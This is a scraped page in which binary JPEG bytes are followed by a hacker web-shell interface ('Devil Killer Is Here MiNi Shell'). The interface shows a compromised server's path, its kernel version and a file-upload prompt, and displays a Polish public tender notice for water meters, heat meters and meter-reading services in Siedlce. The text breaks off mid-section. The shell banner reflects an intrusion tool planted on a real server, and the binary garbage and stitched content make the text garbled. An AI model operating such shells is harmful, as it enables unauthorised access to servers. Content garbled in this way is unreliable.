JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20251029/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20251029/0050306801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa i wymiana wodomierzy, ciepłomierzy, podzielników radiowych oraz usługa (na prawach opcji) odczytów i rozliczenia ciepła w budynkach Miasta Siedlce zarządzanych przez Siedleckie TBS Sp. z o. o. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Siedleckie Towarzystwo Budownictwa Społecznego Sp. z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 710475535</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Starowiejska 60</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Siedlce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">08-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL925 - Siedlecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48256449562</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@stbs.siedlce.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.stbs.siedlce.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa i wymiana wodomierzy, ciepłomierzy, podzielników radiowych oraz usługa (na prawach opcji) odczytów i rozliczenia ciepła w budynkach Miasta Siedlce zarządzanych przez Siedleckie TBS Sp. z o. o. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-78db1a26-40c1-44c2-ae94-6e099af43e5a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00503068</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-78db1a26-40c1-44c2-ae94-6e099af43e5a <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym, a Wykonawcą, z uwzględnieniem wyjątków określonych w Pzp, odbywa się przy użyciu środków komunikacji elektronicznej:<br/>a) Portal dostępowy Urzędu Zamówień Publicznych (e-zamówienia.gov.pl): https://ezamowienia.gov.pl/pl/<br/>b) Poczty elektronicznej na adres e-mail: sekretariat@stbs.siedlce.pl (z wyłączeniem składania ofert).<br/>Strona internetowa zamawiającego: https://stbs.siedlce.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z Rozdziałem 8 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z załącznikiem nr 9 do SWZ oraz załącznikami nr 12, 13 i 14 projektu umowy.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z załącznikiem nr 9 do SWZ oraz załącznikami nr 12, 13 i 14 projektu umowy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">STBS.PUZ.P3/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa i wymiana wodomierzy z modułami radiowymi oraz usługa (na prawach opcji) wykonania zdalnych odczytów urządzeń pomiarowych przynależnych do lokali mieszkalnych komunalnych Miasta Siedlce zarządzanych przez Siedleckie TBS Sp. z o. o.<br/><br/>Zakres podstawowy części 1: <br/>termin realizacji - do 15. 12. 2025 r.<br/><br/>Dostawa oraz wymiana wodomierzy w ilości 900 szt. (450 szt. c.w., 450 szt. z.w.) na fabrycznie nowe wodomierze z modułami radiowymi, plombowaniu wodomierzy w budynkach komunalnych Miasta Siedlce <br/>Wykaz budynków do wymiany wodomierzy oraz lokalizacja wodomierzy zamieszczone są w tabeli nr 1 Opisu przedmiotu zamówienia – załącznik nr 7 do SWZ.<br/>Oferowane wodomierze mieszkaniowe winny spełniać wymagania określone w przepisach metrologicznych o licznikach. Typ wodomierzy winien być zatwierdzony przez Prezesa Głównego Urzędu Miar z aktualną datą wprowadzenia do obrotu. Wodomierze powinny odpowiadać wymaganiom higienicznym, a więc posiadać atest higieniczny. <br/>Dane techniczne cechujące pożądane wodomierze to:<br/>- Jednostrumieniowe<br/>- Nominalny strumień objętości (przepływ) Q3=2,5m3/h <br/>- Przeznaczenie do wody pitnej zimnej i ciepłej <br/>- Klasa metrologiczna: R80H/R40V lub A-V, B-H <br/>- Średnica nominalna DN15; w 1 budynku DN20 (90 szt.)<br/>- Suchobieżne <br/>- Korpus wodomierza musi być wykonany z mosiądzu <br/>- Liczydło wodomierza powinno być hermetycznie zamknięte ( IP68 ) <br/>- Numer fabryczny wodomierza oraz klasa metrologiczna muszą być trwale umieszczone na tarczy liczydła <br/>- Liczydło ośmiopozycyjne bębenkowe odporne na zaparowanie, zapewniające obrót o pełne 360 stopni bez blokady mechanizmu zliczającego <br/>- Wysoka czułość pomiaru przy niskich przepływach (niski próg rozruchu max do 8 litrów), potwierdzona technicznymi dokumentami <br/>- Wysoka odporność na działanie silnego zewnętrznego pola magnetycznego (możliwość stosowania dodatkowych zabezpieczeń) <br/>- Materiały – ekologiczne dopuszczone do kontaktu z wodą pitną <br/>- Cechy legalizacyjne z roku ich montażu <br/>- Okres gwarancji na nowe wodomierze 5 lat, na moduły radiowe min. 10 lat<br/>- Kompaktowe z wbudowanymi modułami radiowymi<br/>- Wszędzie tam, gdzie wymieniono z nazwy typ lub producenta materiałów Zamawiający dopuszcza rozwiązania równoważne tj. zastosowanie materiałów posiadających co najmniej te same parametry techniczne i standardy jakościowe.<br/>- Wszystkie zastosowane przez Wykonawcę urządzenia pomiarowe winny posiadać zabezpieczenia antymagnetyczne,<br/>Szczegółowy opis dostawy i wymiany wodomierzy zawiera Opis Przedmiotu Zamówienia – załącznik nr 7 do SWZ oraz projekt umowy – załącznik nr 8 do SWZ.<br/><br/>Zakres opcji części 1: <br/>Świadczenie usług odczytu wodomierzy i przekazania danych Zamawiającemu, <br/>Opcja uruchomiona będzie tylko po uzyskaniu przez Zamawiającego tytułu do zarządzania nieruchomościami Miasta Siedlce po 31.12.2025 r. Maksymalna czas trwania opcji – wykonywanie usług odczytów wodomierzy od dnia uruchomienia opcji do 31. 12. 2030 r. Maksymalna liczba odczytów wynosi – 13.500 odczytów (900 wodomierzy x 3 odczyty w roku x 5 lat). Łączna wartość opcji nie przekroczy kwoty wyliczonej w następujący sposób: 13.500 odczytów x cena za 1 odczyt. <br/>Zaprogramowanie nowych urządzeń do odczytu zdalnego oraz wykonywanie radiowych odczytów i przekazywanie odczytów Zamawiającemu. Czynności odczytu wodomierzy w zasobach Zamawiającego będą dokonywane przez Wykonawcę na koniec okresów rozliczeniowych trzy razy w roku, odczyty na 30 kwietnia, 31 sierpnia i 31 grudnia, zgodnie z zakresem obowiązków określonym w Opisie Przedmiotu Zamówienia – załącznik nr 7 do SWZ oraz projekcie umowy – załącznik nr 8 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">38421100-3 - Wodomierze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">51210000-7 - Usługi instalowania urządzeń pomiarowych</p> <p class="mb-0">65500000-8 - Odczyty liczników</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zakres opcji części 1: <br/>Świadczenie usług odczytu wodomierzy i przekazania danych Zamawiającemu, <br/>Opcja uruchomiona będzie tylko po uzyskaniu przez Zamawiającego tytułu do zarządzania nieruchomościami Miasta Siedlce po 31.12.2025 r. Maksymalna czas trwania opcji – wykonywanie usług odczytów wodomierzy od dnia uruchomienia opcji do 31. 12. 2030 r. Maksymalna liczba odczytów wynosi – 13.500 odczytów (900 wodomierzy x 3 odczyty w roku x 5 lat). Łączna wartość opcji nie przekroczy kwoty wyliczonej w następujący sposób: 13.500 odczytów x cena za 1 odczyt. <br/>Zaprogramowanie nowych urządzeń do odczytu zdalnego oraz wykonywanie radiowych odczytów i przekazywanie odczytów Zamawiającemu. Czynności odczytu wodomierzy w zasobach Zamawiającego będą dokonywane przez Wykonawcę na koniec okresów rozliczeniowych trzy razy w roku, odczyty na 30 kwietnia, 31 sierpnia i 31 grudnia, zgodnie z zakresem obowiązków określonym w Opisie Przedmiotu Zamówienia – załącznik nr 7 do SWZ oraz projekcie umowy – załącznik nr 8 do SWZ. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2030-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Jedynym kryterium wyboru najkorzystniejszej oferty będzie najniższa cena ryczałtowa brutto dla danej części, podana w formularzu oferty – załącznik nr 1.<br/>2.	Zamawiający będzie oceniał oferty dla każdej części oddzielnie.<br/>3.	Oferty oceniane będą w następujący sposób: <br/><br/>Oferta o najniższej cenie – 100 pkt.<br/>Pozostałe oferty odpowiednio niższe oceny wg wzoru:<br/><br/> cena oferty najniższej x 100<br/>C= ---------------------------------------<br/> cena oferty badanej <br/><br/>C – ilość punktów przyznana ocenianej ofercie w ocenianej części za wykonanie zamówienia.<br/><br/>4.	Za najkorzystniejszą ofertę w każdej części zostanie uznana oferta z najniższą oferowaną ceną brutto, która uzyska najwyższą ilość punktów.<br/>5.	Jeżeli w prowadzonym postępowaniu o udzielenie zamówienia, nie można dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej cenie, Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę lub koszt.<br/>6.	Jeżeli złożono ofertę, której wybór prowadziłby do powstania u zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami. Wykonawca, składając ofertę, informuje zamawiającego, czy wybór oferty będzie prowadzić do powstania u zamawiającego obowiązku podatkowego, wskazując nazwę (rodzaj) towaru lub usługi, których dostawa lub świadczenie będzie prowadzić do jego powstania, oraz wskazując ich wartość bez kwoty podatku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa i wymiana ciepłomierzy z modułami radiowymi oraz usługa (na prawach opcji) wykonania zdalnych odczytów urządzeń pomiarowych i rozliczenia kosztów ciepła w lokalach komunalnych Miasta Siedlce zarządzanych przez Siedleckie TBS Sp. z o. o.<br/><br/>Zakres podstawowy części 2: <br/>termin realizacji - do 15. 12. 2025 r.<br/><br/>Dostawa oraz wymiana ciepłomierzy (liczników ciepła) w ilości 255 szt. na fabrycznie nowe ciepłomierze z modułami radiowymi, plombowaniu ciepłomierzy w budynkach komunalnych Miasta Siedlce,<br/>Wykaz budynków do wymiany ciepłomierzy oraz ich lokalizacja zamieszczone są w tabeli nr 2 Opisu przedmiotu zamówienia – załącznik nr 7 do SWZ,<br/>Wszystkie przeznaczone do wymiany ciepłomierze znajdują się w szachtach na klatkach schodowych.<br/>Oferowane ciepłomierze winny spełniać wymagania określone w przepisach metrologicznych o licznikach. Typ ciepłomierzy winien być zatwierdzony przez Prezesa Głównego Urzędu Miar z aktualną datą wprowadzenia do obrotu. <br/>Ciepłomierze powinny odpowiadać wymaganiom higienicznym, a więc posiadać atest higieniczny.<br/>Dane techniczne cechujące pożądane ciepłomierze to: <br/>- Nominalny strumień objętości q n = 0,6 m3/h <br/>- Przetwornik przepływu mechaniczny wielostrumieniowy wykonany z mosiądzu <br/>- Przelicznik mikroprocesorowy<br/>- Zabezpieczony przed manipulowaniem <br/>- Możliwość zalegalizowania po 5 latach bez konieczności wymiany baterii <br/>- Bateria trwale zespolona – czas pracy minimum 10 lat<br/>- Pomiar zużycia ciepła w GJ <br/>- Kompaktowy z wbudowanym modułem radiowym<br/>- Montaż rozdzielny umożliwiający sezonowe przepłukanie instalacji c.o. bez konieczności demontażu całego urządzenia <br/>- Cechy legalizacyjne z roku ich montażu <br/>- Okres gwarancji na nowe ciepłomierze 5 lat, 10 lat na zamontowane baterie.<br/>- Wszędzie tam, gdzie wymieniono z nazwy typ lub producenta materiałów Zamawiający dopuszcza rozwiązania równoważne tj. zastosowanie materiałów posiadających co najmniej te same parametry techniczne i standardy jakościowe.<br/>- Wszystkie zastosowane przez Wykonawcę urządzenia pomiarowe winny posiadać zabezpieczenia antymagnetyczne,<br/>Szczegółowy opis dostawy i wymiany ciepłomierzy (liczników ciepła) zawiera Opis Przedmiotu Zamówienia – załącznik nr 7 do SWZ oraz projekt umowy – załącznik nr 8 do SWZ.<br/><br/>Zakres opcji części 2: <br/>Świadczenie usług zdalnego odczytu ciepłomierzy i rozliczenia kosztów ciepła oraz przekazania danych Zamawiającemu, zgodnie z zakresem obowiązków określonym poniżej,<br/>Opcja uruchomiona będzie tylko po uzyskaniu przez Zamawiającego tytułu do zarządzania nieruchomościami Miasta Siedlce po 31.12.2025 r. Maksymalna wartość opcji – wykonywanie rozliczeń kosztów ciepła od dnia uruchomienia opcji do 31. 12. 2030r., <br/>Maksymalna wartość rozliczeń w ramach prawa opcji wynosi łącznie do 1530 rozliczeń, w tym:<br/>  a) do 1275 rozliczeń standardowych (1 rozliczenie/rok/lokal, 255 lokali × 5 lat),<br/>  b) do 255 rozliczeń dodatkowych związanych ze zmianą najemcy lub okresem pustostanu.<br/>Rozliczenia dodatkowe zlecane są na wniosek Zamawiającego w miarę potrzeb i rozliczane według ceny jednostkowej wskazanej w ofercie. Łączna wartość opcji nie przekroczy kwoty wyliczonej w następujący sposób: 1530 rozliczeń x cena za 1 rozliczenie.<br/>Zaprogramowanie nowych ciepłomierzy (liczników ciepła) do odczytu zdalnego,<br/>Obliczenie współczynników korekcyjnych lokalowych.<br/>Dokonanie radiowych odczytów ciepłomierzy (liczników ciepła), obliczenie indywidualnych kosztów centralnego ogrzewania po upływie okresu rozliczeniowego oraz dostarczenie rozliczeń indywidualnych i zbiorcze oraz zestawienie w wersji elektronicznej wg. podanego wzoru (stanowiącego załącznik nr 4 do projektu umowy) do siedziby Zamawiającego w ciągu 30 dni od daty otrzymania danych od Zamawiającego. Okresy rozliczeniowe dla poszczególnych budynków: <br/>- Tetmajera 7, Tetmajera 15, Tetmajera 17 - okres rozliczeniowy od 1 maja do 30 kwietnia; <br/>- Geodetów 28, Geodetów 30 okres rozliczeniowy od 1 stycznia do 31 grudnia;<br/>Rozliczenie kosztu ogrzewania na poszczególne lokale nastąpi wg zasad określonych w art. 45a Ustawy Prawo Energetyczne (Dz. U. 1997 nr 54 poz. 348; t.j. Dz. U. z 2021 r. poz. 716, 868.).<br/>W indywidualnym rozliczeniu kosztu centralnego ogrzewania podane będą informacje określone w Rozporządzeniu Ministra Klimatu i Środowiska z dnia 7 grudnia 2021 r. (Dz.U. 2021 poz. 2273) w sprawie warunków ustalania technicznej możliwości i opłacalności zastosowania ciepłomierzy, podzielników kosztów ogrzewania oraz wodomierzy do pomiaru ciepłej wody użytkowej, warunków wyboru metody rozliczania kosztów zakupu ciepła oraz zakresu informacji zawartych w indywidualnych rozliczeniach. Wykonawca zagwarantuje bezpłatne udostępnienie wskazań ciepłomierzy w celu umożliwienia Zamawiającemu przekazanie informacji o wskazaniach najemcy lokalu na jego żądanie. Wykonawca zagwarantuje nieodpłatne udzielenie odpowiedzi na składane reklamacje przez użytkowników lokali.<br/>Szczegółowy opis rozliczenia kosztów ciepła zawiera Opis Przedmiotu Zamówienia – załącznik nr 7 do SWZ oraz projekt umowy – załącznik nr 8 do SWZ.<br/>W trakcie trwania umowy Zamawiający może zmienić metodę rozliczania ciepła. Zmiana metody nastąpi w granicach przedmiotu zamówienia oraz bez zwiększenia maksymalnych limitów i wartości opcji. Zmiana metody nie stanowi istotnej zmiany umowy w rozumieniu art. 455 ustawy Pzp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">38421000-2 - Urządzenia do pomiaru przepływu</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">51210000-7 - Usługi instalowania urządzeń pomiarowych</p> <p class="mb-0">65500000-8 - Odczyty liczników</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zakres opcji części 2: <br/>Świadczenie usług zdalnego odczytu ciepłomierzy i rozliczenia kosztów ciepła oraz przekazania danych Zamawiającemu, zgodnie z zakresem obowiązków określonym poniżej,<br/>Opcja uruchomiona będzie tylko po uzyskaniu przez Zamawiającego tytułu do zarządzania nieruchomościami Miasta Siedlce po 31.12.2025 r. Maksymalna wartość opcji – wykonywanie rozliczeń kosztów ciepła od dnia uruchomienia opcji do 31. 12. 2030r., <br/>Maksymalna wartość rozliczeń w ramach prawa opcji wynosi łącznie do 1530 rozliczeń, w tym:<br/>  a) do 1275 rozliczeń standardowych (1 rozliczenie/rok/lokal, 255 lokali × 5 lat),<br/>  b) do 255 rozliczeń dodatkowych związanych ze zmianą najemcy lub okresem pustostanu.<br/>Rozliczenia dodatkowe zlecane są na wniosek Zamawiającego w miarę potrzeb i rozliczane według ceny jednostkowej wskazanej w ofercie. Łączna wartość opcji nie przekroczy kwoty wyliczonej w następujący sposób: 1530 rozliczeń x cena za 1 rozliczenie.<br/>Zaprogramowanie nowych ciepłomierzy (liczników ciepła) do odczytu zdalnego,<br/>Obliczenie współczynników korekcyjnych lokalowych.<br/>Dokonanie radiowych odczytów ciepłomierzy (liczników ciepła), obliczenie indywidualnych kosztów centralnego ogrzewania po upływie okresu rozliczeniowego oraz dostarczenie rozliczeń indywidualnych i zbiorcze oraz zestawienie w wersji elektronicznej wg. podanego wzoru (stanowiącego załącznik nr 4 do projektu umowy) do siedziby Zamawiającego w ciągu 30 dni od daty otrzymania danych od Zamawiającego. Okresy rozliczeniowe dla poszczególnych budynków: <br/>- Tetmajera 7, Tetmajera 15, Tetmajera 17 - okres rozliczeniowy od 1 maja do 30 kwietnia; <br/>- Geodetów 28, 